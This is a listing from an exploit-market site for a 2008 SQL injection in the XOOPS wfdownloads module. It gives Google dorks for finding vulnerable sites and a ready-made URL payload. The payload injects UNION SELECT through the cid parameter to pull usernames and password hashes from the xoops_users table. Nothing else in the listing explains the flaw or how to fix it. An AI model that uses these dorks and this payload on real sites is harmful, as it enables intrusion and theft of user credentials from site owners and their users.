[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2716
Category
web applications
Date add
06-03-2008
Platform
unsorted
=================================================================
XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability
=================================================================



###############################################################
#
###########XOOPS module wfdownloads SQL Injection
#
################################################################
#
##DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
#
##DORK 2 : allinurl: "modules/wfdownloads"
#
################################################################
EXPLOIT :

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

################################################################



#  0day.today [2024-12-25]  #